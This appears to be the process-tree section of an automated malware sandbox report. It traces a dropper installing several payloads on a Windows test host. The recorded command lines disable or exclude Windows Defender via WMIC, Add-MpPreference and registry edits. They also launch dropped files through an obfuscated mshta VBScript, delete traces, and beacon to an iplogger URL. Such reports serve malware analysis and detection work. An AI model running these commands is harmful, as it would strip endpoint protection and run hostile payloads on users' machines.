            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
  [2] C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\EOQqLsho\IqRhcst.exe
      C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\EOQqLsho\IqRhcst.exe JB /S
      - Modifies Internet Explorer settings
    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
      - Enumerates system info in registry
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffeebb74f50,0x7ffeebb74f60,0x7ffeebb74f70
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1932 /prefetch:8
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1944 /prefetch:8
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4924 /prefetch:8
        - Checks BIOS information in registry
        - Checks for any installed AV software in registry
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5044 /prefetch:8
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1008 /prefetch:8
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1872,13715469100632524843,13780395782489517902,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2996 /prefetch:2
  [2] C:\Users\Admin\AppData\Roaming\wcbafrf
      C:\Users\Admin\AppData\Roaming\wcbafrf
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Roaming\babafrf
      C:\Users\Admin\AppData\Roaming\babafrf
[1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
[1] C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS471324A2\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS471324A2\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1917b8fb5f09db8.exe
            Sun1917b8fb5f09db8.exe
            - Executes dropped EXE
          [6] C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe
              "C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe"
              - Executes dropped EXE
          [6] C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe
              "C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe"
            [7] C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im DVqoN_M2hyOJuqKLhZl3Zhf2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe" & del C:\ProgramData\*.dll & exit
              [8] C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              [8] C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im DVqoN_M2hyOJuqKLhZl3Zhf2.exe /f
                  - Kills process with taskkill
              [8] C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  - Delays execution with timeout.exe
          [6] C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe
              "C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe"
              - Executes dropped EXE
              - Checks SCSI registry key(s)
              - Suspicious behavior: MapViewOfSection
          [6] C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe
              "C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe"
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
          [6] C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe
              "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"
            [7] C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If """" =="""" for %R IN ( ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "" =="" for %R IN ( "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" ) do taskkill -im "%~nXR" /f8⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXEY1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If ""/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh "" =="""" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh " =="" for %R IN ( "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" ) do taskkill -im "%~nXR" /f11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" Z~DYVRL.v,IzgdZv10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "AshFb0VOpmlvVISw0CGgF3Vv.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\AppData\Local\Temp\Done.exe"Done.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSDDED.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS98.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
